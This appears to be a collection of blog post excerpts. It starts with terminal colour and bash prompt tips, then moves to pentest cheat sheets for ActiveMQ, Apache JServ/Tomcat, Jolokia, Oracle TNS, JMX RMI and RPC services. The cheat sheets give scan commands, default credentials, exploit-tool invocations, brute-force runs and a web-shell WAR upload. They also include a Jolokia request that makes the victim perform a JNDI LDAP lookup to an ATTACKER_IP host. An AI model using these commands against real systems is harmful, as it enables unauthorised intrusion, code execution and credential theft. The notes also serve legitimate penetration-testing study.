
Posts

Terminal Color Coding - tput

Value  Color
0      Black
1      Red
2      Green
3      Yellow
4      Blue
5      Magenta
6      Cyan
7      White
8      Not used
9      Reset to default color

Example

green=`tput setaf 2`
red=`tput setaf 1`
reset=`tput sgr0`
echo -e "\n${green}########## Display Text in GREEN Color ########## ${reset} \n"
echo -e "\n${red}########## Display Text in RED Color ########## ${reset} \n"

Customize Bash Prompt in Linux

#Set it permanently
sudo nano ~/.bashrc
#at the end of the file, paste the below and save it
PS1="\e[1;34m[\u - \W]\$ \e[0m"
#\u = username; \H = hostname;
export PS1="\u# "
#Hide everything
export PS1="\W > "
#Show Username with last Directory in color
export PS1="\e[0;32m[\u - \W]\$ \e[0m"
export PS1="\e[1;34m[\u - \W]\$ \e[0m"

• \e[ – Begin color changes
• 0;32m – Specify the color code
• [\u@\h \W]\$ – This is the code for your normal BASH prompt (username@hostname Workingdirectory $)
• \e[0m – Exit color-change mode

The first number in the...

ActiveMQ OpenWire Transport Pentest

#Commonly observed on ports 32064, 32357, 61616; you will find it together with RMI (port 1099) and a web server (8161 - jetty)

Nmap Scan
nmap -sV -Pn -n -T4 --script amqp-info -p 61616 10.10.10.10

Web server -- http://10.10.10.10:8161/admin -> default creds: admin:admin

#Query the server
curl -d 'body="Hello World"' "http://10.10.10.10:8161/demo/message/test?type=queue&clientId=consumerA"
curl -u admin:admin -d "body=message" http://localhost:8161/api/message/TEST?type=queue

Connecting to ActiveMQ (might require creds)
#Download activemq from here
unzip filename
#go to conf/activemq-cli.config and update the IP address
broker {
  local {
    amqurl = "tcp://10.10.10.10:32064"
    jmxurl = "service:jmx:rmi:///jndi/rmi://10.10.10.10:1099/jmxrmi"
    username = ""
    password = ""
    prompt-color = "light-blue...

Apache Jserv - Port 8009

NMAP
nmap -sV --script ajp-auth,ajp-headers,ajp-methods,ajp-request -n -p 8009 10.10.10.10

Ghost Vulnerability - LFI
Patched versions: after 9.0.31, 8.5.51, and 7.0.100
git clone https://github.com/doggycheng/CNVD-2020-10487.git
python CNVD-2020-10487-Tomcat-Ajp-lfi.py -f /index.jsp 192.168.125.128

AJPY
git clone https://github.com/hypn0s/AJPy.git
python3 setup.py install
#Get Version
python tomcat.py version 10.10.10.10
python tomcat.py -v bf -U /opt/metasploit-framework/embedded/framework/data/wordlists/tomcat_mgr_default_users.txt -P /opt/metasploit-framework/embedded/framework/data/wordlists/tomcat_mgr_default_users.txt /manager/html 10.10.10.10
#Upload WAR File
python tomcat.py upload -u tomcat -p tomcat webshell.war 172.17.0.2
#List available applications
python tomcat.py list -u tomcat -p tomcat 172.17.0.2
#GHOST LFI CVE exploit
python tomcat.py read_file --webapp=examples /WEB-INF/web.xml 172.17.0.2

Other attacks - Rev proxy attack nginx Module abuse ...

Jolokia Pentest

Usually found under - no default port - can be used under any web server
/jolokia
/actuator/jolokia

#Get basic version info and where it is being used
curl http://10.10.10.10:8899/jolokia/
#Get the list of functions
curl http://10.10.10.10/jolokia/list
#Check vuln status to AccessLogValve exploit
curl -kL http://10.10.10.10:8080/jolokia/read/Catalina:host=localhost,name=AccessLogValve,type=Valve
#Access an instance
curl -d '{ "type" : "read", "mbean" : "java.lang:type=Memory", "target" : { "url" : "service:jmx:rmi:///jndi/ldap://ATTACKER_IP:8001/jmxrm" } }' 'http://VICTIM_IP:8080/jolokia/'

Jolokia Tool Kit
git clone https://github.com/laluka/jolokia-exploitation-toolkit
python jolokia-parser.py http://10.10.10.10:8899/jolokia/ | tee jolokia-list.log
#Command EXEC - based on the output create the command
grep createStandardHost jolokia-list.log
curl -skg 'http:...

Pentesting Oracle TNS listener/ Database - Port 1521

#nmap
nmap -Pn -sV -p1521 --script=oracle* 10.10.10.10
#Check for service version
#Oracle Database 11g 11.1.0.7, 11.2.0.2, and 11.2.0.3, and 10g 10.2.0.3, 10.2.0.4, and 10.2.0.5,
#try this exploit: GitHub - bongbongco/CVE-2012-1675: Oracle Database TNS Listener Poison Attack Vulnerability
nmap -Pn -sT --script=+oracle-tns-poison.nse -p 1521 10.10.10.10

Oracle SQL: 1521/TCP 1630/TCP 3938/HTTP

ODAT - Oracle Database Attacking Tool
#Download the release https://github.com/quentinhardy/odat/releases/
tar -xvf filename
#Run
./odat all -s 10.10.10.10
./odat all -s 10.10.10.10 -d SID_NAME
./odat all -s 10.10.10.10 -d ''
#Check with creds
./odat all -s 192.168.1.254 -p 1521 -d ORCL -U SYS -P password
#bruteforce when you know SID
./odat all -s 10.10.10.10 -d '' --accounts-file accounts/accounts_multiple.txt

#Enum - doesn't work if password protected
sudo apt install tnscmd10g
#Version
tnscmd10g version -h 10.10.10.10
#Status
tnscmd10g status -h 10.10.10.10 ...

JMX RMI Pentest

RMI can be run on any nonstandard port, and when RMI is running you will observe one more endpoint port connected to it (find it from nmap easily by running rmi-dumpregistry).

#jmxrmi bound name and its signatures might be vulnerable to the MLetMBean vuln, an MBean that can be used for loading additional MBeans over the network.
java.lang.String getVersion()
javax.management.remote.rmi.RMIConnection newClient(java.lang.Object arg)

Java RMI Registry - Port 1616
nmap -Pn -sS -sV --script "rmi-dumpregistry or rmi-vuln-classloader" -p 1616

BaRMIe
#Download the package from releases https://github.com/NickstaDB/BaRMIe/releases/tag/v1.01
java -jar BaRMIe.jar -enum 192.168.1.11 5000
java -jar BaRMIe.jar -attack 192.168.1.11 5000

Remote Method Guesser
https://github.com/qtc-de/remote-method-guesser
java -jar rmg-3.0.0-jar-with-dependencies.jar 10.10.10.10 5000 enum
#Look for vulnerabilities
java -jar rmg.jar enum 10.10.10.10 5000
#Get bound names ...

RPC Mapper Pentest - Port 135, 593

rpcdump.py 10.10.10.10 -p 593

TCP 135 is the Endpoint Mapper and Component Object Model (COM) Service Control Manager. There's a tool called rpcmap.py from Impacket that will show these mappings. This tool needs a stringbinding argument to enable its connection. The examples from -h are:

stringbinding  String binding to connect to MSRPC interface, for example:
ncacn_ip_tcp:192.168.0.1[135]
ncacn_np:192.168.0.1[\pipe\spoolss]
ncacn_http:192.168.0.1[593]
ncacn_http:[6001,RpcProxy=exchange.contoso.com:443]
ncacn_http:localhost[3388,RpcProxy=rds.contoso:443]

rpcmap.py 'ncacn_ip_tcp:10.10.10.10'

reference for MS-DCOM
#if you find IOXIDResolver in the UUIDs you can run the below script to
#list network interfaces
git clone https://github.com/mubix/IOXIDResolver.git
cd IOXIDResolver
python3 -m pip install -r requirements.txt
python IOXIDResolver.py -t 10.10.10.10

Other things to check
reg.py 10.10.10.10 query -keyName HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows -s service...